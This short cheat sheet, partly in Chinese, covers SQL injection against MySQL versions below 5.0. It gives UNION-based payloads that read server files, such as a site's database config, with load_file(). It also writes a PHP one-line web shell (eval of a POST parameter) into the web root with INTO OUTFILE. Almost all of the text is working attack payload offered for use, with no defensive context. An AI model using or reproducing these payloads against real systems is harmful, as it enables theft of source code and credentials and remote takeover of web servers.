mysql <5.0
读文件:load_file()
sql-shell select load_file(”);
d:/www/xx/index.php
/home/webroot/…../index.php
and 1=2 union select 1,load_file(‘c:\\..\\sql_inc.php’),3,4…….;
查看源代码
写文件:into outfile
and 1=2 union select 1,”<?php @eval($_post[‘cmd’]);?>”,3,4 into outfile(‘c:/Inetpub/wwwroot/xxxxx/test.php’)